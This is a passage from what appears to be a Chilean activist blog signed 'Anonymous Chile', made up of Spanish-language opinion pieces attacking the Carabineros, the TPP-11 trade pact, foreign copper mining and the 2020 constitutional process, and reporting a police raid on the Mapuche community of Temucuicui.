Al país le consta, también, que desde el término de la Dictadura (hace treinta años) la institución Carabineros de Chile no ha sido mayormente intervenida por las autoridades, después de que sus efectivos se caracterizaran por haber practicado el terrorismo de estado en delitos que hasta ahora conmueven a la población y que obtuvieron, finalmente, altos grados de impunidad. Millonarios han sido, además, los desfalcos fiscales cometidos por la alta oficialidad, así como los casos de corrupción que han podido destaparse principalmente gracias a la acción del buen periodismo.

Para colmo, son también muchos policías los involucrados en estas últimas décadas en el horror de sus operativos para combatir la que llaman “insurrección terrorista” de la Araucanía, reprimiendo sin criterio alguno las protestas sociales, al grado que hoy sus “servicios especiales” se distinguen por ser uno de los grupos policiacos más fieros del mundo, así como culpables de vaciarles las cuencas de sus ojos a decenas de jóvenes. Llegando al extremo de lanzar al río Mapocho a uno de los manifestantes dentro del Estallido Social de fines del 2019.

En estos días ya se sabe la condena de ocho carabineros por el asesinato del comunero Mapuche Camilo Catrillanca, una operación que los comprometió como autores intelectuales, materiales y cómplices que incluso intentaron ocultar información y tergiversar los hechos, obstaculizando por largos meses la acción de los tribunales.

La misma complicidad de la clase política con las Fuerzas Armadas y su extendida corrupción, ha favorecido ciertamente a la policía uniformada. Por lo mismo, hoy existe alto consenso en que ésta debiera someterse a una completa reestructuración, pero sin que hasta el momento el Gobierno y el Parlamento acometan una propuesta seria al respecto. De esta forma, el presidente Piñera corre ya el riesgo de ser reconocido en nuestra historia como un genocida más en La Moneda en relación al encono policial descargado contra nuestras minorías étnicas, cuanto destinada a aplacar el descontento social del país. A la zaga, por supuesto, de gobernantes como Arturo Alessandri y el propio Pinochet por sus reiteradas masacres en contra de nuestra población.

Más que con el ánimo de intervenir en favor de esta reestructuración, las autoridades se proponen recién ahora una reforma al respecto, como manera de evitar que esta tarea sea cumplida por la futura Convención Constituyente, y Carabineros de Chile sea disuelto en favor de varias instituciones policiales como ocurre en otros países. Junto con que el Estado proceda a renovar a sus integrantes, corregir sus procedimientos y poner a sus efectivos bajo el poder civil. A esta altura de la complejidad social, no hay razón para que recaiga en un solo mando la responsabilidad de misiones tan diversas como garantizar el orden público, controlar los flujos del tránsito, velar por la soberanía geográfica y proteger a las autoridades, las empresas e instancias de todo orden en materia de educación, salud, trabajo y patrimonio cultural.

Justamente en estos días, hay un hospital público que pide la instalación en sus dependencias de una comisaría de Carabineros a objeto que sus funcionarios sean resguardados ante la airada acción de aquellos familiares de pacientes impedidos de acercarse a sus seres queridos cuando son tratados o fallecen por el Covid 19. Es cosa de imaginar cuántos policías se necesitarían tan solo para hacer guardia en todos los centros de salud, colegios, universidades, oficinas públicas y centros de producción y comercio. Además de velar por el orden en las calles, avenidas, plazas, puentes, estadios, aeropuertos y carreteras, entre otros. Tan a merced en la actualidad de asaltantes y bandas armadas que han sofisticado sus armas a efecto del incontrolado contrabando y, por cierto, la acción y complicidad de los propios policías.

De lo que estamos seguros es que para todo esto habría más que duplicar o triplicar el número de carabineros y seguir desaguando el erario nacional en favor de ésta y de todas las ramas castrenses que se comen abusivos recursos en sueldos, pensiones y pertrechos que rápidamente caen en desuso o se utilizan en contra de nuestra propia población. Puede parecer un dato irrelevante, pero ¡vaya que nos consta la atractiva seducción que los uniformados ejercen para mantener solícitos a los gobernantes y muy especialmente a los ministros de Defensa! Es decir, a quienes vienen ocupando uno de los cargos más apetecibles dentro de la gran repartija de cargos públicos a cargo, por turno, de los partidos políticos. Gracias a las consabidas lisonjas de las cúpulas militares y policiales, como por los recursos que pueden acaudalar por sueldos, viáticos y dádivas durante sus correspondientes desempeños. Los que pueden resultar muy auspiciosos para solventar su escalamiento político.

TPP-11 y la soberanía de mercado en Chile

Publicada el 12/08/2021 por Anonymous Chile

«Ya es sabido que este acuerdo no solo busca proteger legalmente las inversiones de las grandes corporaciones beneficiadas, sino incluso sus expectativas de ganancias, en desmedro de lo que pase con los cambios en las legislaciones de los países».

Luego que el desgobierno de Sebastián Piñera, el cual ha llegado a una aprobación ciudadana del 7%, nuevamente comete una torpeza en su pobre gestión, al poner en suma urgencia la aprobación en el Senado del Acuerdo Transpacífico de Cooperación Internacional (TPP-11).

Un anuncio que ha sido defendido por el Ministro de Relaciones Exteriores de Chile, Andrés Allamand, quien hace solo unos pocos meses atrás planteaba su rechazo a firmar el Acuerdo de Escazú, aludiendo paradójicamente a razones de soberanía nacional, ya que el país podía ser llevado a tribunales internacionales por su no cumplimiento.

Si bien es sabido que Chile en los últimos 30 años ha sido el Estado en el mundo que más ha firmado tratados de libre comercio (26) con más de 50 países, impulsando así una economía abierta a los mercados internacionales, hacerlo en este contexto de proceso constituyente es muy poco inteligente políticamente.

Señalo esto, ya que lo que la revuelta social y el aplastante triunfo del apruebo por una nueva constitución evidenció, es que la sociedad en Chile simplemente dijo basta del modelo neoliberal, impuesto en dictadura y profundizado en democracia. El cual ha puesto a la inversión extranjera, al saqueo de los bienes comunes y al consumo desenfrenado, como sus pilares para sostener un crecimiento económico insostenible socialmente y ambientalmente.

La elite de Chile, totalmente sobreideologizada, desde un pensamiento economicista y antisocial, que cree aún en la autorregulación de los mercados, pareciera que ni con todo lo que ha pasado en el país, es capaz de hacer un giro medianamente razonable, que tome en consideración las demandas más importantes que está exigiendo la sociedad.

Una de esas demandas, ha sido impulsada por el Movimiento “Chile Mejor sin TLC”, el cual agrupa a diferentes organizaciones, movimientos, parlamentari@s y ciudadan@s, quienes han denunciado los peligros para el país de llegar a firmar el TPP-11.

Las razones son precisamente por la soberanía de los pueblos y por el cuidado de los bienes comunes de todas y todos, ya que es sabido que este acuerdo no solo busca proteger legalmente las inversiones de las grandes corporaciones beneficiadas, sino incluso sus expectativas de ganancias, en desmedro de lo que pase con los cambios en las legislaciones de los países.

Esto quiere decir, que en el caso que las grandes empresas se sientan “pasadas a llevar legalmente”, puedan recurrir a Centros de Arbitraje pro empresariales, como lo son el Centro Internacional de Arreglo de Diferencias de Inversiones (CIADI), la Comisión de las Naciones Unidas para el Derecho Mercantil Internacional (CNUDMI) o la Corte Internacional de Arbitraje de la Cámara de Comercio Internacional.

De ahí que empresas extractivas como Barrick o BHP Billiton, en el caso que se apruebe el TPP-11, puedan recurrir a estos Centro de Arbitraje, cuando vean que la normativa ambiental cambie, lo que para la Convención Constitucional puede ser muy contraproducente. Esto ya que demandas como la Desprivatización de las Aguas o los Derechos de la Naturaleza por ejemplo, las cuales podrían ser parte de la nueva constitución, puedan verse en peligro en su aplicación futura.

La necesidad por tanto de que el Estado de Chile rechace este nuevo tratado y no se haga cómplice una vez más de la entrega de sus territorios a las grandes transnacionales, es primordial en estos tiempos constituyentes. Basta de seguir entregando el agua, la tierra y las semillas a quienes solo quieren seguir especulando con ellas.

El mal uso que hace el desgobierno de la noción de soberanía, solo evidencia que solo la aplica cuando están en juego los acuerdos sobre Derechos Humanos y Derechos Ambientales que defienden a las comunidades y territorios, como pasó con el Acuerdo de Escazú. En cambio, cuando se trata de darle en bandeja a grandes corporaciones las riquezas del país y negar la posibilidad de diversificar su economía, ahí no se habla de soberanía.

Por ende, la soberanía que defiende el desgobierno de Chile se termina subordinando a los grandes grupos económicos finalmente, lo que ha sido una constante en estos últimos 30 años, en donde se ha vendido al mundo la idea de un país exitoso, centrado en un aumento del PIB a partir de grandes exportaciones de commodities, pero sin ningún tipo de valor agregado.

Esperemos que lxs senadorxs voten en contra de este TPP-11, entendiendo que Chile cambió y que no quiere más abusos.

Violenta represión policial contra el pueblo mapuche

Publicada el 12/08/2021 por Anonymous Chile

No es coincidencia que la acción militar de hoy haya ocurrido el mismo día de la sentencia del asesino de nuestro hermano Camilo Catrillanca. En estas tierras que hoy se han recuperado hemos generado control territorial efectivo en los más diversos ámbitos.

Cuando se informaba sobre el veredicto condenatorio al asesino (Carabinero Carlos Alarcón) del comunero Mapuche Camilo Catrillanca. Diversos y violentos allanamientos se desarrollaban en las comunidades Mapuche que conforman Temucuicui, por parte de la Policía de Investigaciones (PDI), «que contó con la participación de más de cien policías, drones, equipos de otras zonas y el apoyo de seis fiscales, por diversos delitos, principalmente tráfico de drogas«, según El Mercurio. En este Mega operativo (según la versión de la policía) habrían sido repelidos a tiros por «desconocidos», resultando varios policías heridos y uno fallecido. «Los detectives fueron atacados con armas de fuego por un grupo de delincuentes, quienes utilizando armamento de grueso calibre hirieron al Inspector L.M.B., quien producto de un impacto balístico recibido en su rostro, falleció en el lugar», detalló la policía civil en un comunicado.

https://videos.files.wordpress.com/IDuDnk53/video-web_dvd.mp4

Por su parte las comunidades en resistencia difundieron un comunicado que compartimos:

Terrorismo de estado en Ercilla: El intento de dejar a lxs victimarixs como víctimas

Desde el interior de nuestro territorio ancestral expresamos a la opinión pública nuestro más absoluto rechazo al terrorismo del estado de Chile, que se hace una vez más presente continuando las prácticas colonialistas que históricamente han ejercido la violencia y el genocidio sobre nuestro pueblo nación mapuche.

La incursión militar que hoy se llevó a cabo con más de 800 efectivos policiales fuertemente armados es una afrenta directa no solo contra el territorio de Temuicucui, sino que un nuevo agravio contra la lucha viva de nuestro pueblo nación mapuche y de la resistencia territorial de los pueblos que resisten América Latina / Abya Yala.

Estas son las mismas prácticas coloniales con las que vinieron hace algun tiempo atrás a sangre y fuego a asesinarnos y despojarnos de nuestros territorios de vida. Temucuicui es un ejemplo emblemático a nivel nacional e internacional de una larga lucha que ha permitido recuperar tierras ancestrales que habían sido despojadas por colonos latifundistas con el apoyo del Estado de Chile. Estas tierras no nos han sido regaladas, sino que han costado varias décadas de lucha, y la caída en combate de valiosos weychafe como nuestro hermano Camilo Catrillanca.

No es coincidencia que la acción militar de hoy haya ocurrido el mismo día de la sentencia del asesino de nuestro hermano Camilo Catrillanca, y que el cumpleaños de su hija Wakolda. En estas tierras que hoy se han recuperado hemos generado control territorial efectivo en los más diversos ámbitos. Sin embargo, ante los avances que hemos conseguido con nuestra lucha, hoy quieren amedrentarnos nuevamente, mantenernos sumisos, tal como lo hicieron en algún minuto con el poder de las armas.

Pero hoy, gracias chao ngenechen, el mensaje de lucha de nuestro pueblo nación mapuche continúa vivo en cada rincon de este territorio, y ha dejado gente movilizada que hace frente defendiendo a su lof. Por este mismo motivo, (como se puede ver en el video a continuación) ejercemos nuestro derecho al libre tránsito por nuestros territorios, y no nos dejaremos amedrentar ante las armas de los terroristas del Estado de Chile, esta es la actitud coherente que mantenemos desde nuestra dignidad rebelde que llevamos a la práctica en el día a día.

Como señala nuestro werkén Mijael Carbone Queipul “Queremos decirle al gobierno que ellos son los que nos han asesinado, los que han quebrado el diálogo, los que nos han querido quitar nuestra historia. Entonces cuando un pueblo se levanta, cuando una comunidad se reivindica, cuando sus jóvenes están dispuestos a dar la vida por defenderla independientemente, nos van a querer criminalizar diciendo que este es un territorio de terroristas, de narcotraficantes, ladrones de madera, para justificar la intervención militar de nuestro territorio”. Por esto hacemos un llamado a estar atentos pues la situación es crítica para todos, no sabemos lo que ocurrirá mañana, pero claramente sabemos que comenzará una casa de brujas para conseguir responsables frente a los dos oficiales muertos. El objetivo es criminalizar nuestra lucha, intentando dejar a los victimarios como víctimas.

https://videos.files.wordpress.com/pVNPWSJO/10000000_419426632833700_2332276594779607859_n_dvd.mp4

El lucrativo negocio del saqueo extractivista de cobre en Chile

Publicada el 12/08/2021 por Anonymous Chile

La extraordinaria Importancia del Cobre Para Chile

Al hablar del cobre en Chile, debería primar sobre cualquier análisis que se haga de él: el tema de la dimensión, importancia o magnitud, que este metal tiene en nuestra economía y en el mundo en general. Pero desgraciadamente, la extraordinaria dimensión de esta colosal riqueza, es desconocida por la mayoría de los chilenos.

Con sus 742 mil km. cuadrados, el territorio chileno es apenas el 0,5 % de la superficie terrestre, donde vive solo el 0,24% de la población del planeta, y produce solo el 0,1 % del PIB mundial, sin embargo, en este tan pequeño país, se encuentra más del 40% de las reservas mundiales de cobre. Poco importa que ciertas estimaciones digan que Chile posee sólo un tercio de estas reservas, y que otros digan que estas sobrepasan el 50 % de las reservas mundiales, lo que importa es comprender la dimensión de esta riqueza, sobretodo, teniendo en consideración que el cobre es un elemento imprescindible para toda la humanidad en la actualidad.

Lo que se debe tomar conciencia es que estas reservas mundiales de cobre, no se encuentran en el país más grande del mundo, Rusia, ni en el país más poblado del mundo, China, sino que en un pequeñísimo país donde viven apenas 18 de los 7.600 millones de habitantes de este planeta. Es entonces una anomalía de la naturaleza, que se haya concentrado en este pequeño país, una tan colosal riqueza como es el cobre, riqueza que debería estar al servicio de todo el pueblo chileno.

Es tal la colosal magnitud de esta riqueza, que en Chile no debería existir ningún tema político o económico, que pueda resistir una comparación con el cobre. Sin embargo, el cobre y en particular la magnitud de esta riqueza, es un tema tabú en los medios de comunicación y en la discusión pública. Este olvido y ocultamiento no es casual, sino que es perfectamente planificado, puesto que mientras menos se hable del cobre, su expoliación se puede efectuar casi sin oposición.

El Formidable porvenir del Cobre

Siendo las reservas de cobre chilenas, lejos las más grandes del mundo, y las de más bajo costo, ellas se transforman en una de las más rentables inversiones mundiales, que quieren apoderarse los grandes conglomerados metalúrgicos del planeta, puesto que el cobre tiene un formidable porvenir.

La automatización, la computación y los robots han invadido las fábricas de todos los países desarrollados, y en el curso de este nuevo siglo, toda la industria mundial será automatizada, y la única fuente de energía que moverá la industria robotizada será la electricidad, y a ello se suma la electromovilidad. Toda la nueva economía, la sociedad de la información, la Tercera Ola como ya hace años la llamó Alvin Toffler, tendrán como única fuente de energía la electricidad, y la electricidad tendrá siempre un soporte casi único en su distribución: el cobre. En los próximos siglos, la humanidad seguirá consumiendo cobre, y casi la mitad de ese cobre se encuentra en Chile.

A este gran polo de desarrollo de la electricidad y del consumo de cobre, se sumará la necesaria e ineludible electrificación e ingreso al desarrollo de los países de menor desarrollo. Si países como China o India alcanzan el nivel de consumo de cobre de EEUU o Europa, solo estos dos países consumirán casi el doble de cobre, que lo que actualmente consume todo el mundo.

Este brillante porvenir del cobre, lo conocen muy bien las grandes transnacionales mineras, y por esa razón llegaron en masa a nuestro país a apoderarse de las mayores y mejores reservas de cobre del mundo, lo que comenzó a mediado de los años ochenta, pero sobre todo a partir de 1990, cuando terminó la dictadura.. A partir de ese año, la extraordinaria riqueza que representa el cobre para Chile, se convirtió en una maldición o un desastre.

El cobre chileno ya no es chileno

Como preámbulo a esta parte, es necesario señalar que en 1971, en el gobierno del Presidente Allende se nacionalizó la Gran Minería del Cobre, por la unanimidad del Congreso Nacional, por lo que más del 90% de la producción de cobre quedó en manos del Estado.

Al término de la dictadura, en 1989, existían solo 3 medianamente grandes mineras extranjeras, “La Disputada” que había sido del Estado hasta 1979, “Mantos Blancos S.A.” y “Minera El Indio”, que producían en total 214.000 T., el resto lo producían empresas del Estado, Codelco y Enami, del total 1.609.000 T., que producía Chile en ese año. Es decir, solo el 13% del cobre chileno lo producían empresas extranjeras. Hoy, en el año 2019, las empresas extranjeras producen el 70% del cobre chileno. Esto significa que en estos 30 años, la inversión extranjera ha sido espectacular.

Cualquier analista extranjero e incluso chileno, podría deducir que ha sido un gran éxito de los gobiernos chilenos de los últimos 30 años, haber conseguido una tan importante inversión extranjera en la explotación, de lejos, de la riqueza más importante que tiene Chile, el cobre. Pero veamos si el país pierde o gana con este tipo de inversión.

Según los Anuarios de Cochilco , las mineras extranjeras han sacado de Chile, entre 1990 y 2019, la friolera de 85.818 T. del equivalente de cobre fino, lo que al precio promedio de los últimos meses (3 dólares la libra) equivale a alrededor de US$ 567.760 millones. Pero esa es la exportación declarada por las mismas empresas, pero es de conocimiento público que la exportación real debe ser a lo menos un 20 a 25% superior a la cifra oficial, lo que daría que la exportación de cobre por parte de las mineras extranjeras alcanzaría las 100 mil toneladas y su valor debería superar de US$ 680.000 millones, a lo cual habría que agregar un 30% más por el oro, la plata, el molibdeno, el renio, cobalto, etc., contenido en la exportación de concentrados de cobre, lo que sumando todo nos arroja que las mineras extranjeras, se han llevado de nuestro país alrededor de 900.000 millones de dólares. Esa es la dimensión de la extraordinaria riqueza que significa el cobre para Chile, sin embargo, como dijimos más arriba, esto ha sido un desastre para nuestro país, aunque quizás el desastre, deriva directamente de los gobernantes que hemos tenido los últimos 30 años, que han conscientemente permitido este desfalco.

Y decimos desfalco, porque de esos 900.000 millones de dólares que se han llevado las mineras extranjeras: ¿Cuánto es lo que estas mineras han tributado al Estado y a todos los chilenos? Difícil saberlo porque la tributación es secreta en Chile desde el año 1995, precisamente para que los chilenos no nos enteráramos que las empresas extranjeras en general y las mineras en particular, no pagan o casi no pagan impuesto a la renta en Chile. Sin embargo, hemos podido conocer la tributación de las mineras extranjeras gracias a un informe del S.I.I. solicitado por el Senado el año 2003, y recientemente, en un informe solicitado al SII por la diputada Claudia Mix. Esos informes oficiales nos dicen que desde 1990 a 2019, la tributación a la renta más impuesto específico a la minería conocido como royalty, ha sido de US$ 29.030 millones.

Esto significa, que se llevaron de Chile 900 mil millones de dólares y dejaron en el país solo US$ 29.030 millones en 30 años de explotación, es decir, dejaron un minúsculo 3,2% de una riqueza que ya desapareció de nuestro suelo para siempre. Es una ofensa a la dignidad nacional. Solo a modo de comparación la empresa estatal Codelco , entre 1990 y 2019, entregó excedentes al Estado por US$ 78.526 millones, produciendo en ese mismo periodo 50.634 T. de cobre, casi la mitad menos que las mineras extranjeras.

¿Por qué las mineras extranjeras se han llevado tanto cobre y otros subproductos y han pagado tan pocos tributos? Es aquí donde aparece el desastre permitido por nuestros gobernantes desde 1990 en adelante. Hasta 1989, las mineras extranjeras tenían que pagar el impuesto en base a la renta presunta, es decir en base a lo que vendían. Ninguna minera podía escapar al pago del impuesto a la renta, porque desde que tenía que vender o exportar la primera tonelada de cobre, tuviera o no utilidades, tenía renta y tenía que pagar el impuesto. Todo cambió en junio de 1990, cuando se aprobó la Ley 18.985, que para las grandes mineras cambió el impuesto desde renta presunta a renta efectiva. ¿Qué quiere decir eso? Que si las mineras obtienen o declaran utilidades o ganancias, pagan el Impuesto a la Renta, pero si declaran pérdidas no pagan impuesto, es más, acumulan pérdidas, y no pagarán impuesto hasta que las eventuales futuras ganancias absorban todas las pérdidas acumuladas.

Las mineras extranjeras llegaron en masa a nuestro país, porque con la Ley 18.985 les permitiría llevarse el cobre y subproductos que quisieran sin pagar impuestos, y todo en el más estricto secreto, porque la tributación fue declarada secreta en 1995, y por ello el 99,99% de los chilenos no sabían que las mineras extranjeras no pagaban impuestos en Chile. ¿Por qué no pagaban impuestos? Volvemos a repetirlo. Simple, bastaba con no declarar ganancias para eximirse del impuesto. Pero si Codelco, la empresa estatal, con yacimientos muy antiguos, con mayor profundidad de los rajos o socavones, menores leyes del mineral, tenía importantes ganancias, no podía ser que las mineras extranjeras no las tuvieran, con minas más nuevas y mejores leyes. ¿Qué hicieron para no tener ganancias? Muy simple, evadían y eludían las ganancias gracias a la actitud permisiva de los gobiernos de turno.

Las mineras extranjeras han evadido las ganancias y la tributación con diferentes triquiñuelas.

Todo comienza con el hecho que la inversión que las casas matrices realizan en Chile, no lo hacen mediante inversión directa, sino que es su filial minera “chilena” la que debe endeudarse con financieras relacionadas con la casa matriz y domiciliadas en paraísos tributarios o fiscales, financieras a las que las mineras “chilenas” les pagan intereses y comisiones muy por encima del mercado normal. En algunas mineras los gastos financieros han alcanzado al 40% del total de sus gastos, y de esa manera disminuyen o hacen desaparecer las ganancias en Chile.

Otra forma de evadir son los precios de transferencia tanto en lo que compran o lo que venden a empresas relacionadas. Por ejemplo, esos enormes camiones mineros, que valen alrededor de 5 millones de dólares, no lo compran al fabricante sino a una empresa comercial relacionada domiciliada en un paraíso fiscal a la cual le pagan 7 u 8 millones de dólares, lo que aumenta los gastos de la minera “chilena”, de manera a disminuir las ganancias para no pagar impuestos. Exportan el concentrado a una empresa relacionada, en un barco y seguros de una empresa relacionada, y gastos de fundición y refinación muy superiores a precios del mercado, de manera que las ventas son muy inferiores a los que debieran ser a precios de mercado. Las ganancias de esos sobreprecios las reciben empresas relacionadas del mismo grupo, pero en el extranjero, y el mayor gasto para la minera “chilena”, le sirve para disminuir o hacer desaparecer sus ganancias, de manera a no pagar impuesto a la renta en Chile.

Existen muchas otras formas de generar artificialmente gastos, que son aún más ilícitos, como las ventas en mercados de futuro, a empresas relacionadas que ganan lo que la minera “chilena” pierde. Disminuyen la cantidad y los contenidos metálicos de cobre y otros subproductos que van en el concentrado, amparados en el hecho Aduanas, Cochilco o el S.I.I. no fiscalizan las exportaciones de cobre. ¿Por qué estos organismos no fiscalizan a las mineras extranjeras, si ese es su rol? Porque los directivos y funcionarios de estos organismos, no pueden fiscalizar a las mineras extranjeras, sino reciben órdenes directas de las autoridades de gobierno. Por ellos hablamos del desastre que han significado en el cobre y la minería en general, los gobernantes chilenos.

De lo que hemos reseñado más arriba, queda en evidencia que el cobre aporta significativas ganancias al país, cuando es el propio Estado que explota esos yacimientos, por lo que, para terminar con la deplorable explotación minera por empresas extranjeras, habría que aprovechar que la Nueva Constitución que se redactará el próximo año, contemplara nuevamente la nacionalización de toda la gran minería. Pero desgraciadamente, en los actuales planteamientos que existen para la Nueva Constitución, ningún partido de izquierda ha soslayado siquiera, la idea de nacionalizar la deplorable y catastrófica minería extranjera.

El blindaje de la constitución fascista del dictador chileno Augusto Pinochet Ugarte

Publicada el 12/08/2021 por Anonymous Chile

En Chile, 15 millones de personas tenían derecho a voto en el reciente Plebiscito que inicia el Proceso Constituyente para elaborar una Nueva Constitución. Sólo votaron 7,5 millones de personas (50,7%) de las cuales 5,4 millones optaron por el “Apruebo” al inicio de este proceso, esto es, EL 36,5% DEL UNIVERSO ELECTORAL. La Abstención, es decir, los que se negaron a participar en este proceso oscuro, alcanzó 7,3 millones de personas, es decir, el 49,3% del universo electoral.

Chile se encuentra en el inicio de un llamado “Proceso Constituyente” que, en el discurso oficial y en el de la Oposición Política formal, se presenta como el camino que llevará a la generación de una Nueva Carta Fundamental de la República de Chile o “Constitución Política”, que reemplazaría a la Constitución vigente promulgada por la Dictadura Militar de Augusto Pinochet en 1980, también plebiscitada bajo Estado de Excepción (es decir, con la población chilena bajo mando militar) y reformada múltiples veces con el fin de fortalecerla para una mejor protección del Modelo Económico Capitalista Neo-liberal que la dictadura implementó en 1978.

La Constitución de 1980 fue, en esencia, el blindaje político que requería tal Modelo Económico y que ha permanecido intacto hasta hoy. Para cambiar ese Modelo se requiere, en consecuencia, de una nueva Constitución.

Pero el Proceso Constituyente que se inició el pasado 25 de octubre en Chile con un publicitado Plebiscito no es sino que la última Reforma introducida a esa Constitución dictatorial precisamente para mantener el blindaje del Modelo Neo-liberal. Es decir, este Plebiscito del 25 de octubre se enmarcó dentro de la institucionalidad política heredada por la Dictadura de Pinochet, es parte de esa institucionalidad y no es sino la salida política que encontraron el actual Gobierno y la Clase Política para mantenerla, pues, en los hechos, en Chile NO HAY OPOSICIÓN, sino una “Clase” o “Casta” políticaparlamentaria que ocupa ese calificativo, pero sin demostrarlo ni ejercerlo.

Los resultados de ese proceso, entonces, son previsibles si se mantiene la agenda del Gobierno actual del Presidente Piñera y de la TOTALIDAD de los Partidos Políticos (Clase Política) más aún cuando este plebiscito recién celebrado, inicia un “Proceso Constituyente” que está normado por una Ley especial promulgada en diciembre de 2019 (y votada favorablemente por casi la unanimidad del Parlamento chileno) que señala, explícitamente, qué temas se pueden o no se pueden abordar dentro del desarrollo del Proceso Constituyente; cómo se deben o no se deben votar e incluso quiénes pueden votar.

TODO estaba ya normado desde nueve meses ANTES de que se desarrollara el Plebiscito en comento. Ciertamente, desde la segunda semana del Estallido Social los medios masivos de comunicación se pusieron al servicio de las informaciones que el Gobierno de Piñera quería o no quería difundir y la campaña internacional que han levantado ahora, pos-plebiscito, es parte de la desinformación oficial: los resultados del evento celebrado el 25 de octubre recién pasado distan grandemente del “exitismo” que exhiben el Gobierno de Piñera y la Clase Política, pues la mitad del universo electoral, a pesar de las “promociones” para que la gente asistiera a votar, NO LO HIZO y el abstencionismo típico de los jóvenes fue reemplazado, ahora, por la gente adulta, que no fue seducida por un proceso turbio desde su inicio, como demostraremos a continuación.
LOS HECHOS…Los porfiados hechos.

La explosión social iniciada el 18 de octubre de 2019 en Santiago de Chile, la capital del país, fue una respuesta sin conducción ni orientación a una serie de abusos que se cometían desde el fin de la Dictadura Militar e inicio del periodo “democrático”, en 1990. No habían organizaciones ni coordinación de organizaciones detrás de las movilizaciones: había IRA.

Las primeras manifestaciones estudiantiles por un alza de $ 30 (treinta pesos chilenos) en el valor del pasaje del tren subterráneo que cruza Santiago (el “Metro”) se extendieron a todo Chile, desde Arica a Punta Arenas, bajo la consigna “NO SON 30 PESOS…. SON 30 AÑOS”, reflejando con ello la decepción de un pueblo que había visto cómo los reemplazantes de la Dictadura se negaban a reemplazar, sin embargo, la institucionalidad dictatorial y en especial, se negaban a reemplazar el modelo económico de desangramiento de los recursos naturales del país, de sus empresas públicas, de sus servicios básicos, carreteras, puertos, aeropuertos y hasta los peces y el mar, todo ello privatizado por los que habían reemplazado “a la Dictadura”, pero conservaron el Modelo Económico de robo y saqueo a los bienes de todos los chilenos.

Bajo esa consigna, las movilizaciones sociales pusieron en jaque a toda la Clase Política y a la Institucionalidad, puesto que las demandas básicas del Chile Movilizado fueron simples y claras: RENUNCIA DEL PRESIDENTE PIÑERA y ASAMBLEA CONSTITUYENTE PARA UNA NUEVA CONSTITUCIÓN POLÍTICA.

Ninguna de estas demandas está presente en el Proceso Constituyente organizado por el Gobierno y la Clase Política parlamentaria e iniciado en el Plebiscito recién celebrado.

El carácter “a-político” de la explosión social, sin un plan de acción ni una estrategia que implementara, siquiera, esas demandas básicas, le dio tiempo al Gobierno del Presidente Piñera para mover todo el aparataje político y comunicacional en defensa de la institucionalidad que blinda al Modelo Económico heredado de la Dictadura.

Para ello, Piñera siempre contó, desde el inicio del estallido, con el respaldo de la Clase Política que también veía peligrar sus privilegios (el Parlamento chileno tiene dietas parlamentarias de $20 millones de pesos chilenos mensuales, sumando la dieta base, las regalías y… las horas extras, mientras el sueldo mínimo legal, que aprueba ese mismo Parlamento, apenas supera los $ 300 mil pesos chilenos mensuales… sin horas extras. Es decir, 70 VECES MENOS.

Las organizaciones sociales más entrevistadas por los medios de desinformación masiva (más entrevistadas, pero sin representación de bases) también se pusieron al servicio de este plan de salvataje de la institucionalidad dictatorial y de un Gobierno que no superaba el 7% de aceptación popular y de un Parlamento que ni siquiera llegaba al 5% de aceptación popular.

En efecto, bajo la dirección de la Central Unitaria de Trabajadores (CUT) una multisindical que funciona como una ONG financiada por el Estado, las llamadas Organizaciones Sociales, como Colegios Profesionales, activistas por cambios en el sistema de pensiones, organizaciones feministas como 8M e inicialmente los estudiantes secundarios que iniciaron las movilizaciones, todas ellas reunidas bajo el pomposo título de “Mesa de Unidad Social”, convocaron a un Paro Nacional DE ONCE MINUTOS (11 minutos) para el día 11 de marzo de 2020, como acto de protesta contra el Gobierno de Piñera.

La CUT está presidida por una militante del Partido Comunista de Chile. Las demás organizaciones también están presididas por militantes de Partidos Políticos ya en ese instante absolutamente desacreditados.

El “Paro” comentado, CONVOCADO CINCO MESES DESPUÉS DE INICIADO EL ESTALLIDO, fue la única acción de “resistencia” de las llamadas Organizaciones Sociales, alejadas del todo de una representación popular real y todas ellas ajenas al interés y necesidades colectivos.

La Mesa de Unidad Social operó siempre en el boicot a las asambleas ciudadanas autoconvocadas que buscaban la Asamblea Constituyente como salida política al conflicto social, lo que fue denunciado por los estudiantes secundarios al retirarse de esta coordinación funcional al Gobierno de Piñera antes del comentado “Paro”.

Sin embargo, la mayor intervención del Gobierno y probablemente del empresariado nacional y transnacional en el salvataje a la institucionalidad de la Dictadura Militar que blinda el Modelo Económico que les favorece de sobremanera, se presentó precisamente en los órganos más cuestionados y desprestigiados del Estado: el Parlamento y los Partidos Políticos.

La “Cocina”

El 11 de noviembre de 2019, antes de que se cumpliera el primer mes desde el inicio del Estallido Social, los Partidos Políticos de Oposición firmaron un Acuerdo donde rechazaban la oferta del Gobierno de Piñera de establecer un “Congreso Constituyente” para la elaboración de una nueva Constitución Política y como salida para la situación de crisis que se manifestaba a lo largo del país. Los partidos políticos de “Oposición”, sin excepción, señalaron públicamente que el mecanismo debía ser LA ASAMBLEA CONSTITUYENTE.

Señalaban, en el rechazo común a la propuesta del Gobierno, lo siguiente:

“… La propuesta de un Congreso Constituyente por parte del gobierno se aleja de la demanda popular por participación y deliberación en la importante tarea a la que nos enfrentamos. Tanto para la opinión pública, como para expertos y organizaciones de la sociedad civil, la Asamblea Constituyente es el mecanismo más democrático para garantizar una amplia participación ciudadana que otorgue plena legitimidad al proceso”.

Sólo 90 HORAS después, los mismos Partidos “de Oposición” más los partidos políticos de la Derecha afines al Gobierno de Piñera, firmaban otro Acuerdo donde descartaban de plano la Asamblea Constituyente.

El nuevo Acuerdo se denominó “Acuerdo por la Paz Social” y fue rebautizado como “La Cocina” por la población movilizada, que no participó en ninguna instancia de conversación o negociación dada la cooptación de las “Organizaciones Sociales” y su propia nula capacidad de levantar organizaciones libres de la intervención de la Clase Política.

En el Nuevo Acuerdo (“La Cocina”) firmado en la madrugada del 15 de noviembre de 2019, no sólo se descartaba la convocatoria a una Asamblea Constituyente que automáticamente hubiera desactivado al Parlamento (es decir, a “los cocineros”) sino que se establecía un mecanismo “Constituyente” que incluía un Reglamento de cómo debía funcionar este proceso: la Ley 21.200.

La Ley 21.200

Esta Ley no es sino una reforma a la Constitución de Pinochet y establece el mecanismo de operación y de deliberación del proceso Constituyente acordado entre el Gobierno de Piñera y la Clase Política y fue presentada de la siguiente manera:

